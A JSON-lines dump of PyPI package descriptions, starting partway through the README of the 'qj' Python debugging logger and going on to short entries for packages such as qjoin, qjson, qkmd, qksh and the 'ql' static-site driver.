toc=1.\nqj: Added tic.You can usetoc=-1to clear out all previoustics:qj(tic=1)\ndo_something()\nqj(tic=2)\ndo_something_else()\nqj(tic=3)\nfinish_up()\nqj(toc=-1)\n\nqj: some_func: tic=1 <394>: Adding tic.\nqj: some_func: tic=2 <396>: Adding tic.\nqj: some_func: tic=3 <398>: Adding tic.\nqj: some_func: toc=1 <400>: Computing toc.\nqj: 0.2185 seconds since tic=3.\nqj: 0.5200 seconds since tic=2.\nqj: 1.3830 seconds since tic=1.You can log the public properties for the input withqj(foo, p=1):qj(some_object, p=1)\n\nqj: some_func: some_object, p=1: some_object.__str__() output\nqj: Public properties:\n some_method(a, b=None, c='default')\n some_public_propertyNote that this can be dangerous. In order to log the method signatures,\nPython'sinspectmodule can actually cause code to execute on your object.\nSpecifically, if you have@propertygetters on your object, that code will\nbe run. If your@propertygetter changes state, using this flag to print the\nobject's public API will change your object's state, which might make your\ndebugging job even harder. 
(Of course, you should never change state in a getter.)This is generally useful to quickly check the API of an unfamiliar object\nwhile working in a jupyter notebook.You can log some useful stats about x instead of its value withqj(arr, n=1):qj: some_func: arr, n=1 (shape (min (mean std) max) hist) <257>: ((100, 1), (0.00085, (0.46952, 0.2795), 0.97596), array([25, 14, 23, 23, 15]))This only works if the input (x) is a numeric numpy array or can be cast to one,\nand if numpy has already been imported somewhere in your code. Otherwise, the value\nofxis logged as normal.The log string is augmented with a key to the different parts of the logged value.The final value is a histogram of the array values. The number of histogram buckets\ndefaults to 5, but can be increased by passing an integer tongreater than 5:qj(arr, n=10)\n\nqj: some_func: arr, n=10 ...: (..., array([11, 14, 8, 6, 10, 13, 14, 9, 7, 8]))You can add atensorflow.Printcall toxwithy = qj(some_tensor, t=1):qj: some_func: some_tensor, t=1 <258>: Tensor(\"some_tensor:0\", ...)\nqj: Wrapping return value in tf.Print operation.And then later:sess.run(y)\n\nqj: some_func: some_tensor, t=1 <258>: [10 1] [[0.64550841]...Note that the Tensorflow output includes the shape of the tensor first ([10 1]),\nfollowed by its value. This only works if x is atf.Tensorobject andtensorflowhas already been imported somewhere in your code.The number of logs printed from thetf.Printcall isqj.MAX_FRAME_LOGS(describedbelow, defaults to 200) ift is True. Otherwise,\nit is set toint(t). Thus,t=1prints once, butt=Trueprints 200 times.You can also turn on numerics checking for anytf.Tensorwithy = qj(some_tensor, tfc=1):For example,log(0)is not a number:y = qj(tf.log(tensor_with_zeros), tfc=1)\n\nqj: some_func: tf.log(tensor_with_zeros), tfc=1 <258>: Tensor(\"Log:0\", ...)\nqj: Wrapping return value in tf.check_numerics.And then later:sess.run(y)\n\nInvalidArgumentError: qj: some_func: tf.log(tensor_with_zeros), tfc=1 <258> : Tensor had Inf valuesNote that tf.check_numerics is very slow, so you won't want to leave these in your graph.\nThis also only works if x is atf.Tensorobject andtensorflowhas already been\nimported somewhere in your code.You can override the return value of qj by passing any value tor:some_function(normal_arg, special_flag=qj(some_value, r=None))\n\nqj: some_func: some_value, r=None <272>: some flag value\nqj: Overridden return value: NoneAs in the example, this can be useful to temporarily change or turn off a\nvalue being passed to a function, rather than having to delete the value,\nwhich you might forget about.You can add timing logs to any function with@qj(time=1)orqj(foo, time=100):@qj(time=1)\ndef foo():\n ...\n\nqj: module_level_code: time=1 <343>: Preparing decorator to measure timing...\nqj: Decorating with timing function.\n\nfoo()\n\nqj: some_func: Average timing for across 1 call <343>: 0.0021 secondsNote that the log message is reported from the location of the call to the function that generated the message\n(in this case, line 343 insome_file.py, inside ofsome_func).Settingtimeto a larger integer value will report timing stats less freqently:foo = qj(foo, time=1000)\nfor _ in range(1000):\n foo()\n\nqj: some_func: foo, time=1000 <359>: \nqj: Wrapping return value in timing function.\nqj: some_func: Average timing for across 1000 calls <361>: 0.0023 secondsYou can catch exceptions and drop into the debugger with@qj(catch=1)orqj(foo, catch=):@qj(catch=1)\ndef foo(): raise Exception('FOO!')\n\nqj: module_level_code: catch=1 
<371>: Preparing decorator to catch exceptions...\nqj: Decorating with exception function.\n\nfoo()\n\nqj: some_func: Caught an exception in <377>: FOO!\n> (377)()\n----> 1 foo()\n\nipdb>This can be particularly useful in comprehensions where you want to be able to inspect\nthe state of the comprehension that led to an exception:[qj(foo, catch=1)(x) for x in [1, 2, 3]]\n\nqj: some_func: foo, catch=1 <389>: \nqj: Wrapping return value in exception function.\nqj: some_func: Caught an exception in <389>: FOO!\n...\n> (389)()\n----> 1 [qj(foo, catch=1)(x) for x in [1, 2, 3]]\n\nipdb> x\n1Settingcatchwill always drop into the debugger when an exception is caught -- this feature\nis for debugging exceptions, not for replacing appropriate use oftry: ... except:.You can log all future calls to an object withqj(foo, log_all_calls=1):s = qj('abc', log_all_calls=1)\n\nqj: some_func: 'abc', log_all_calls=1 <380>: abc\nqj: Wrapping all public method calls for object.\n\ns.replace('a', 'b')\n\nqj: some_func: calling replace <385>: replace('a', 'b')\nqj: some_func: returning from replace <385>: bbcThis can break your code in a variety of ways and fail silently in other ways, but some problems\nare much easier to debug with this functionality. For example, figuring out why sequences of numbers\nfrom a seeded random number generator differ on different runs with the same seed:rng = qj(np.random.RandomState(1), log_all_calls=1)\n\nqj: some_func: np.random.RandomState(1), log_all_calls=1 <395>: \nqj: Wrapping all function calls for object.\n\nfor k in set(list('abcdefghijklmnop')):\n rng.randint(ord(k))\n\n# First run:\nqj: some_func: calling randint <413>: randint(97)\nqj: some_func: returning from randint <413>: 37\nqj: some_func: calling randint <413>: randint(99)\nqj: some_func: returning from randint <413>: 12\nqj: some_func: calling randint <413>: randint(98)\nqj: some_func: returning from randint <413>: 72\n...\n\n\n# Subsequent run with a reseeded rng:\nqj: some_func: calling randint <413>: randint(101)\nqj: some_func: returning from randint <413>: 9\nqj: some_func: calling randint <413>: randint(100)\nqj: some_func: returning from randint <413>: 75\nqj: some_func: calling randint <413>: randint(103)\nqj: some_func: returning from randint <413>: 5\n...This fails (in theory, but not as written) because sets are iterated in an undefined order.\nSimilar failures are possible with much more subtle structure. Comparing different series\nof log calls makes it very easy to find exactly where the series diverge, which gives a good\nchance of figuring out what the bug is.You can make particular log messages stand out withqj(foo, pad=):qj(foo, pad='#')\n\n##################################################\nqj: some_func: foo, pad='#' <461>: foo\n##################################################Similarly, add blank lines:qj(foo, pad=3)\n\n# Some other log message...\n\n\n\nqj: some_func: foo, pad=3 <470>: foo\n\n\n\n# The next log message...Parameters:There are seven global parameters for controlling the logger:qj.LOG: Turns logging on or off globally. Starts out set to True, so\nlogging is on.qj.LOG_FN: Which log function to use. All log messages are passed to this\nfunction as a fully-formed string, so the only constraints are\nthat this function takes a single parameter, and that itisa function -- e.g., you can't setqj.LOG_FN = printunless\nyou are usingfrom __future__ import print_function(although\nyou can define your own log function that just calls print if\nyou don't like the default). 
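For instance, a minimal sketch of the kind of override described just above (the actual default is described below) could look like this:

```python
from __future__ import print_function  # lets plain print be used from python 2 as well

from qj import qj

# Any function that accepts one fully-formed log string will do.
qj.LOG_FN = lambda message: print(message)

qj('hello')  # this call is now logged through print instead of the default logger
```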
Defaults tologging.infowrapped\nin a lambda to support colorful logs.qj.STR_FN: Which string conversion function to use. All objects to be logged\nare passed to this function directly, so it must take an arbitrary\npython object and return a python string. Defaults tostr, but a\nnice override ispprint.pformat.qj.MAX_FRAME_LOGS: Limits the number of times per stack frame the logger\nwill print for each qj call. If the limit is hit, it\nprints an informative message after the last log of the\nframe. Defaults to 200.qj.COLOR: Turns colored log output on or off globally. Starts out set to\nTrue, so colorized logging is on.qj.PREFIX: String that all qj logs will use as a prefix. Defaults to'qj: '.qj.DEBUG_FN: Which debugger to use. You shouldn't need to set this in most\nsituations. The function needs to take a single argument, which\nis the stack frame that the logger should start in. If this is\nnot set, then the first time debugging is requested, qj attempts\nto load ipdb. If ipdb isn't available, it falls back to using pdb.\nIn both cases,qj.DEBUG_FNis set to the respectiveset_tracefunction in a manner that supports setting the stack frame.Global Access:In many cases when debugging, you need to dive into many different files\nacross many different modules. In those cases, it is nice to have a single\nlogging and debugging interface that is immediately available in all of the\nfiles you touch, without having to import anything additional in each file.To support this use case, you can call the following function after importing\nin one file:from qj import qj\nqj.make_global()This will add qj to python's equivalent of a global namespace, allowing you\nto call qj from any python code that runs after the call toqj.make_global(), no matter what file or module it is in.When using qj from a jupyter notebook, qj.make_global() is automatically called\nwhen qj is imported.As described inBasic Usage, you can also just use:from qj_global import qjThis is generally what you want, but qj does not force you to pollute the global\nnamespace if you don't want to (except in jupyter notebooks).qj Magic Warning:qj adds a local variable to the stack frame it is called from. That variable is__qj_magic_wocha_doin__. If you happen to have a local variable with the same\nname and you call qj, you're going to have a bad time.Testing:qj has extensive tests. You can run them with nosetests:$ nosetests\n........................................................................................\n----------------------------------------------------------------------\nRan 88 tests in 1.341s\n\nOKOr you can run them directly:$ python qj/tests/qj_test.py\n........................................................................................\n----------------------------------------------------------------------\nRan 88 tests in 1.037s\n\nOKIf you have both python 2.7 and python 3.6+ installed, you can test both versions:$ nosetests --where=qj/tests --py3where=qj/tests --py3where=/qjtests3\n$ python3 qj/tests/qj_test.py\n$ python3 qj/tests3/qj_test.pyDisclaimer:This project is not an official Google project. 
It is not supported by Google\nand Google specifically disclaims all warranties as to its quality,\nmerchantability, or fitness for a particular purpose.Contributing:See how tocontribute.License:Apache 2.0."} +{"package": "qjam", "pacakge-description": "No description available on PyPI."} +{"package": "qjdltools", "pacakge-description": "Some usefull tools for deep learning.\nAuthor: QiJi"} +{"package": "qjer", "pacakge-description": "ngwer 11 04 lyg"} +{"package": "qjob", "pacakge-description": "qjobUtility to split shell commands into jobs, then submit them for computation to a queue of a SGE or Slurm cluster.Seehttps://qjob.readthedocs.io/"} +{"package": "qjobs", "pacakge-description": "qjobsqjobs is an attempt to get a cleaner and more customizable output than the one\nprovided by qstat (Sun Grid Engine).Quick installationqjobsis available on PyPI. It is compatible with Python3.6 and higher.Installation ofqjobscan be done withpip:python3 -m pip install -U --user qjobsThat\u2019s it! If the directory where pip installs packages (usually~/.local/bin) is in yourPATHenvironment variable, you only have to\nrunqjobsfrom the command line to launch the wrapper. Enjoy!"} +{"package": "qjoin", "pacakge-description": "qjoinqjoin is a data manipulation library that provides simple and efficient joining and collection processing functionality. It simplifies and optimizes the process of joining different entities and provides methods for aggregating, organizing, and sorting data.qjoin is a simple and efficient way to join and process dataqjoin is a steroid extension of thezipfunction in pythonqjoin works on all iterators, whether lists of dictionaries, objects or sqlalchemy or django modelsProject linksPyPI ReleasesDocumentationSource codeIssue trackerChatInstallationpipinstallqjoinUsageHere are examples of how qjoin will be used in the future.# Basic usageqjoin.on(persons).join(cities,key=\"city\").all()person_infos=qjoin.on(persons).join(cities,left=\"city\",right=\"city\").all()forperson,cityinperson_infos:print(f'{person}-{city}')person_infos=qjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city)\\.join(cars,left=lambdap:p.car,right=lambdac:c.car)\\.all()forperson,city,carinperson_infos:print(f'{person}-{city}-{car}')# Advanced transformationqjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city)\\.join(cars,left=lambdap:p.car,right=lambdac:c.car)\\.as_aggregate(Aggregate,['person','city','cars'])TODOThe following syntaxes are to be implemented and documented. You want to discuss it, participate or suggest other syntaxes, join us ondiscord.# Advanced transformationqjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city)\\.join(cars,left=lambdap:p.car,right=lambdac:c.car)\\.as_aggregate(Aggregate,lambdap,ci,ca:Aggregate(p,ci,ca))qjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city)\\.as_lookup(lambdap:p.name)qjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city)\\.as_multilookup(lambdap,c:c.city)# Advancedqjoin.on(persons)\\.join(cities,left=lambdap:p.city,right=lambdac:c.city,scan_strategy=qjoin.RIGHT_LOOKUP).join(cars,left=lambdap:p.car,right=lambdac:c.car,default=Car(car='unknown',constructor='unknown'))\\.as_aggregate(Aggregate,lambdap,ci,ca:Aggregate(p,ci,ca))Try with dockerYou can run this template with docker. The manufactured image can be distributed and used to deploy your application to a production environment.docker-composebuild\ndocker-composerunappTry with gitpodgitpodcan be used as an IDE. 
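Referring back to the Usage examples earlier in this description, a self-contained version of the basic join could be sketched as below. The persons/cities records are hypothetical sample data, and the qjoin.on(...).join(...).all() call is the API that this description itself presents as the intended usage:

```python
import qjoin

# Hypothetical sample records -- qjoin is described as working on any iterables,
# including plain lists of dictionaries.
persons = [
    {'name': 'Alice', 'city': 'Paris'},
    {'name': 'Bob', 'city': 'Lyon'},
]
cities = [
    {'city': 'Paris', 'population': 2100000},
    {'city': 'Lyon', 'population': 513000},
]

# Join persons with cities on the shared 'city' key, as in the basic-usage example above.
for person, city in qjoin.on(persons).join(cities, key='city').all():
    print(person['name'], '->', city['population'])
```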
You can load the code inside to try the code.The latest versionYou can find the latest version to ...gitclonehttps://github.com/FabienArcellier/qjoin.gitContributingIf you want to discuss about it, contact us throughdiscordContributing to this project is done through merge request (pull request in github). You can contribute to this project by discovering bugs, opening issues or submitting merge request.more inCONTRIBUTING.mdLicenseMIT LicenseCopyright (c) 2023-2023 Fabien ArcellierPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qjqqjq", "pacakge-description": "An feature extraction algorithm, improve the FastICA"} +{"package": "qjson", "pacakge-description": "qjson=====quick and dirty way to convert json string to python object.# install`$pip install qjson`orjust copy the qjson/qjson.py to your project.#usage```pythonimport qjsonjson_str = '{\"person\":\\{\"name\":\"jerry\", \"age\":32, \"web\":{\"url\":\"http://jatsz.org\", \"desc\":\"blog\"}}, \\\"grade\": \"a\", \"score\":[80,90]}'info = qjson.loads(json_str)assert info.person.name == \"jerry\"assert info.grade == \"a\"assert info.score == [80, 90]```-0.1.8:fix array as top element, which also has object within it.-0.1.8:supporting array has object as element."} +{"package": "qjson2json", "pacakge-description": "qjson to json converterjsonis a very popular data encoding with a good support in many\nprogramming languages. It may thus seam a good idea to use it for manually managed\ndata like configuration files. Unfortunately, json\u00a0is not very convenient for such\napplication because every string must be quoted and elements must be separated by commas.\nIt is easy to parse by a program and to verify that it is correct, but it\u2019s not connvenient\nto write.For this reason, different alternatives to json have been proposed which are more human\nfriendly like [yaml] orhjsonfor instance.qjson\u00a0is inspired by hjson by being a human readable and extended json. The difference\nbetween qjson and hjson is that qjson extends its functionality and relax some rules.Here is a list of qjson text properties:comments of the form //... #... 
or /.../commas between array values and object members are optionaldouble quote, single quote and quoteless stringsnon-breaking space is considered as a white space characternewline is \\n or \\r\\n, report \\r alone or \\n\\r as an errornumbers are integer, floating point, hexadecimal, octal or binarynumbers may contain underscore '_' as separatornumbers may be simple mathematical expression with parenthesismember identifiers may be quoteless strings including spacesthe newline type in multiline string is explicitely specifiedbackspace and form feed controls are invalid characters except\nin /.../ comments or multiline stringstime durations expressed with w, d, h, m, s suffix are converted to secondstime specified in ISO format is converted to UTC time is secondsUsageInstall the qjson to json converter package with the commandpython3 -m pip install qjson2jsonOnced installed, it can be used.$python3\n>>> import qjson2json\n>>> qjson2json.decode('a:b')\n'{\"a\":\"b\"}'Reliabilityqjson2json is a python extension using the C library qjson-c.\nqjson-c is a direct translation of qjson-go that has been extensively tested\nwith manualy defined tests (100% coverage). AFL fuzzing was run on qjson-c\nfor many months without finding a simple hang or crash. For this fuzzing test,\nthe json text produced, when the input was valid, was checked with json-c to\ndetect invalid json. All json output in the tests are valid json.This code should thus not crash or hang your program, and json output is valid.\nWhat could not be extensively and automatically tested is if the output is\nthe expected output. It was only verified in the manual tests of qjson-go.For bug reports in this qjson2json package, fill an issue inthe qjson-py3 project.Contributingqjson\u00a0is a recently developped package. It is thus a good time to\nsuggest changes or extensions to the syntax since the user base is very\nsmall.For suggestions or problems relative to syntax, fill an issue in theqjson-syntax project.Any contribution is welcome.LicenseThe licences is the 3-BSD clause."} +{"package": "qk", "pacakge-description": "No description available on PyPI."} +{"package": "qkcli", "pacakge-description": "qkcliQuick-CLI is a simple library that helps the creation of CLI applications."} +{"package": "qKDB", "pacakge-description": "qKDB is a python interface for KX system database KDB+"} +{"package": "qkmd", "pacakge-description": "qkmdQuick markdown what you need, just via a link.Getting StartedHave you ever try to stored the link(URL) in.txtto browse it one day later or few months after? But when you open the file again, muttering to yourself 'What do I store for this?'Have you learnmarkdownsyntax, but get bored to use it to record the link(URL) by press the[]and()?Theqkmdis for you, you can just give it a link(URL) then the webpage title will be extract, format to a[title](http://example.com)pattern. 
Also you can customize the title what you like, append timestamp, append code snip ...PrerequisitesIf you live in theresource blocked areaorInternet censorship area, please consider setting a proxy first.Install the porxy software, assure you can use browser to open the webpageInstallpolipo$## Ubuntu / Debian$sudoapt-getupdate\n$sudoapt-getinstallpolipo$## redhat / CentOSPolipo installation instructionsExport the proxyexporthttps_proxy=http://127.0.0.1:8123exporthttp_proxy=http://127.0.0.1:8123Theqkmddefault proxy port number is 8123.InstallingAssure you python version is >= 3.4$pipinstallqkmdor$python3setup.pyinstallor$pythonsetup.pyinstallUsageusage: qkmd.py [-h] [-d] [-v] [-c [comment [comment ...]]] [-l language]\n [-s source-code-file] [-C] [-t [title [title ...]]]\n [-o output-file] [-P]\n [link]\n\nQuickly formatting markdown `link`, convenient your daily life/work.\n\npositional arguments:\n link generate the markdown format link\n\noptional arguments:\n -h, --help show this help message and exit\n -d, --date append `RFC 2822` date format\n -v, --version display current version of `qkmd`\n -c [comment [comment ...]], --comment [comment [comment ...]]\n give the link a simple comment\n -l language, --language language\n specific the code language\n -s source-code-file, --source source-code-file\n give the source code snip file\n -C, --color source code syntax hightline\n -t [title [title ...]], --title [title [title ...]]\n add title manually\n -o output-file, --save output-file\n save the markdown to a file\n -P, --print turn off print the markdown format in screenHere is a simple way to reduce your time and simplify your operation.Assure you always want to store the file to$HOME/mark.mdand highlight the codealiasmark='function mark(){ qkmd $* -o ~/mark.md -C;}; mark'Authorsalopex cheung@alopexLicenseThis project is licensed under the MIT License - see theLICENSEfile for details"} +{"package": "qkogpt", "pacakge-description": "quantization"} +{"package": "qk-pub", "pacakge-description": "No description available on PyPI."} +{"package": "qksh", "pacakge-description": "f5 qksh================Introduction------------This project implements an SDK for the iControl REST interface for BIG-IP\u00ae.Users of this library can create, edit, update, and delete configuration objectson a BIG-IP\u00ae.This project implements an utility for interacting with F5 iHealth. Users ofthis utility can upload qkview, download log file, config file and commandoutput from an iHealth link.Installation------------.. code:: shell$> pip install qkshUsage-----.. code:: pythonqksh qksh 1-12345678 test-1.qkview test-2.qkviewqksh qksh https://ihealth.f5.com/qkview-analyzer/qv/1234567/files/download/Y29uZmlnL2JpZ2lwLmNvbmYDocumentation-------------Documentation is hosted on `Read the Docs `_Filing Issues-------------See the Issues section of `Contributing `__.Contributing------------See `Contributing `__Test----Before you open a pull request, your code must have passing`pytest `__ unit tests. In addition, you shouldinclude a set of functional tests written to use a real BIG-IP devicefor testing. Information on how to run our set of tests is includedbelow.Unit Tests~~~~~~~~~~We use pytest for our unit tests.#. If you haven't already, install the required test packages listed inrequirements.test.txt in your virtual environment... code:: shell$ pip install -r requirements.test.txt#. Run the tests and produce a coverage report. 
The ``--cov-report=html`` willcreate a ``htmlcov/`` directory that you can view in your browser to see themissing lines of code... code:: shellpy.test --cov ./qksh --cov-report=htmlopen htmlcov/index.htmlStyle Checks~~~~~~~~~~~~We use the hacking module for our style checks (installed as part of step 1 inthe Unit Test section)... code:: shell$ flake8 ./Contact-------abc89d@gmail.comLicense-------The MIT License (MIT)~~~~~~~~~~~Permission is hereby granted, free of charge, to any person obtaining a copyof this software and associated documentation files (the \"Software\"), to dealin the Software without restriction, including without limitation the rightsto use, copy, modify, merge, publish, distribute, sublicense, and/or sellcopies of the Software, and to permit persons to whom the Software isfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included inall copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS ORIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THEAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHERLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISINGFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGSIN THE SOFTWARE."} +{"package": "qky-tools", "pacakge-description": "python tools collection"} +{"package": "ql", "pacakge-description": "quillquill is the \"driver\" forspin.systems,\nand packaged on PyPi asql.A more detailed description of the package namespace can be found below,\nbut for everyday usage the commands needed are:importquillasqlql.ssm.check_manifest()# Check all component repos' statusql.ssm.repos_df# print the summary dataframeql.fold.wire.standup()# build or rebuild any 'wire' module MMD documents as HTML pagesql.fold.cut.standup()# build or rebuild any 'cut' module Jinja templates as HTML pagesql.remote_push_manifest()# Add/commit/push any dirty repos, triggering CI buildThe last step will also rebuild any sites which have dirty repos (to avoid content partially falling behind,\nwhen for instance the templates for a site are changed).Structureql\u2836scan: Read.mmdfilesscan\u2836lever: Parse.mmdfile formatql\u2836manifest: Readspin.systemsconfigurationql\u2836fold: Manage*.spin.systemssubdomainsfold\u2836address: Manage subdomain address shorthandfold\u2836wire: Emit HTML websites from.mmdfilesfold\u2836cut: Emit HTML websites from.htmlJinja templates and.mdfilesHelper CLINote: for reasons unknown, thedefoptCLI only works on 3.10+Installation adds aqlcommand (for deployment) andcyl(for local preview).\nThese two commands handle repo-internal and -external output of generated sites respectively\n(cylcurrently only for thefold.cutmodule, notfold.wire,\nso not yet sufficient to replace in the CI pipeline).usage: ql [-h] [-d [DOMAINS_LIST ...]] [--incremental] [-n] [-r] [-w] [-v]\n [-g] [--internal | --no-internal] [--version]\n\nConfigure input filtering and output display.\n\noptions:\n -h, --help show this help message and exit\n -d [DOMAINS_LIST ...], --domains-list [DOMAINS_LIST ...]\n Names of the subdomains to build.\n (default: None)\n --incremental compute MD5 checksums for each of the generated files.\n (default: False)\n -n, --no-render Dry run mode.\n (default: False)\n -r, --recheck Only regenerate files whose input checksum has changed since the last\n 
incremental run.\n (default: False)\n -w, --watch Rebuild the domains continuously (incompatible with incremental/recheck).\n (default: False)\n -v, --verbose Whether to announce what tasks are being carried out.\n (default: False)\n -g, --gitlab-ci Source the manifest repos (i.e. git pull them) and then stash\n the changes after building, switch to the www branch, pop the\n stash and push the changes (i.e. publish the website content).\n (default: False)\n --internal, --no-internal\n Whether to build sites internal (ql) or external (cyl,\n not including 'fold.wire') to the repo.\n (default: True)\n --version show program's version number and exitSo for example:cyl-dporePopulates~/spin/cyl/porewith thecutmodule's portion ofpore.spin.systemsIncremental builds, rechecking, and watchingTowards the goal of implementing an incremental build system on CI, quill has 2 extra modes:anincrementalbuild mode: where in addition to building the entire site (or domain list),\nMD5 checksums are computed for each of the generated files. In this mode, thebuild auditeris activated,\nand stores a log as it generates the templates. Use the-iflag when you want to recreate the\ninventory of template MD5 hashes.To run a build for the same domain as above, in incremental mode, run:cyl-dpore-iarecheckbuild mode: a subset of incremental builds in which only files whose input checksum\nhas changed since the last incremental run are regenerated. This makes the build substantially faster\nas there is a reduced scope of templates to transform. Use the-rflag (alongside-i) when you\nwant to double check only the files in the template hash inventory and only regenerate what differs on disk.To run a recheck afterwards, and only build any files that changed in between builds, run:cyl-dpore-i-rawatchbuild mode: incompatible with incremental/recheck, this is for continuously rebuilding\n(incremental mode is designed for repeated use, like on an incremental build system). 
Use the-wflag when you want to have the page rebuild automatically in the background.Watching is incompatible with incremental mode, but rebuilds following changes to a file.The corresponding command to the ones above would be:cyl-dpore-wUsage memoRequires directory of static site repositories at\nlocation specified inspin.ini(by default\nthis is as a sibling directory../ss/), containing\na filemanifest.mmdbeginning with the apex domain and\nimmediately followed by a subdomain list.Below is a demo of accessing thespin.systemsmanifest file\n(ssm) which implements theMMDclass, subclassingDoc,\nwhich parses the file contents in a structured way (specifically,\nas a list of colon-separated values).>>>frompprintimportpprint>>>fromquillimportssm>>>importpandasaspd>>>ssmParsedMMDfile(Documentof1block,containing1list)>>>ssm.listHeaderedlistwith16items>>>pprint(ssm.list.all_nodes)[-spin.systems:spin-systems:masterwww:,-:cal:qu-cal:masterwww,-,:log:spin-log:masterwww,-,:conf:qu-conf:masterwww,-,:pore:qu-pore:masterwww,-,:ocu:naiveoculus:masterwww,-,:arc:appendens:masterwww,-,:qrx:qu-arx:masterwww,-,:erg:spin-erg:masterwww,-,:opt:spin-opt:masterwww,-,:poll:qu-poll:masterwww,-,:arb:spin-arb:masterwww,-,:reed:qu-reed:masterwww,-,:noto:qu-noto:masterwww,-,:plot:qu-plot:masterwww,-,:doc:spin-doc:masterwww,-,:labs:qu-labs:masterwww]Similarlyssm.list.nodesgives just the subdomains, andssm.list.headergives the main site\ndomain.>>>ssm.list.header-spin.systems:spin-systems:>>>ssm.list.header.parts['spin.systems','spin-systems','master www']>>>ssm.list.nodes[0].parts['cal','qu-cal','master www']>>>ssm.list.nodes[1].parts['log','spin-log','master www']>>>ssm.list.nodes[2].parts['conf','qu-conf','master www']>>>pprint(ssm.all_parts)[['spin.systems','spin-systems','master www'],['cal','qu-cal','master www'],['log','spin-log','master www'],['conf','qu-conf','master www'],['pore','qu-pore','master www'],['ocu','naiveoculus','master www'],['arc','appendens','master www'],['qrx','qu-arx','master www'],['erg','spin-erg','master www'],['opt','spin-opt','master www'],['poll','qu-poll','master www'],['arb','spin-arb','master www'],['reed','qu-reed','master www'],['noto','qu-noto','master www'],['plot','qu-plot','master www'],['doc','spin-doc','master www'],['labs','qu-labs','master www']]>>>ssm.as_df()domainrepo_namebranches0spin.systemsspin-systemsmasterwww1calqu-calmasterwww2logspin-logmasterwww3confqu-confmasterwww4porequ-poremasterwww5ocunaiveoculusmasterwww6arcappendensmasterwww7qrxqu-arxmasterwww8ergspin-ergmasterwww9optspin-optmasterwww10pollqu-pollmasterwww11arbspin-arbmasterwww12reedqu-reedmasterwww13notoqu-notomasterwww14plotqu-plotmasterwww15docspin-docmasterwww16labsqu-labsmasterwwwThis is just for review purposes currently, and any further info can be added as long\nas all the lines (\"nodes\") have the same number of colon-separated values.The manifest is parsed inmanifest\u2836parsingbyparse_man_nodewhich is wrapped intossm.repos,\nwhich will print out the repos' git addresses for each CNAME domain or subdomain:('spin.systems', 'git@gitlab.com:spin-systems/spin-systems.gitlab.io.git')\n('cal', 'git@gitlab.com:qu-cal/qu-cal.gitlab.io.git')\n('log', 'git@gitlab.com:spin-log/spin-log.gitlab.io.git')\n('conf', 'git@gitlab.com:qu-conf/qu-conf.gitlab.io.git')\n('pore', 'git@gitlab.com:qu-pore/qu-pore.gitlab.io.git')\n('ocu', 'git@gitlab.com:naiveoculus/naiveoculus.gitlab.io.git')\n('arc', 'git@gitlab.com:appendens/appendens.gitlab.io.git')\n('qrx', 'git@gitlab.com:qu-arx/qu-arx.gitlab.io.git')\n('erg', 
'git@gitlab.com:spin-erg/spin-erg.gitlab.io.git')\n('opt', 'git@gitlab.com:spin-opt/spin-opt.gitlab.io.git')\n('poll', 'git@gitlab.com:qu-poll/qu-poll.gitlab.io.git')\n('arb', 'git@gitlab.com:spin-arb/spin-arb.gitlab.io.git')\n('reed', 'git@gitlab.com:qu-reed/qu-reed.gitlab.io.git')\n('noto', 'git@gitlab.com:qu-noto/qu-noto.gitlab.io.git')\n('plot', 'git@gitlab.com:qu-plot/qu-plot.gitlab.io.git')\n('doc', 'git@gitlab.com:spin-doc/spin-doc.gitlab.io.git')\n('labs', 'git@gitlab.com:qu-labs/qu-labs.gitlab.io.git')as well as a DataFrame which is modified by theql.ssm.check_manifest()to include 'live' views on\nthe repos (note that this method takes aadd_before_check=Trueargument, which controls whethergit add --allis run on each repo to check if it's 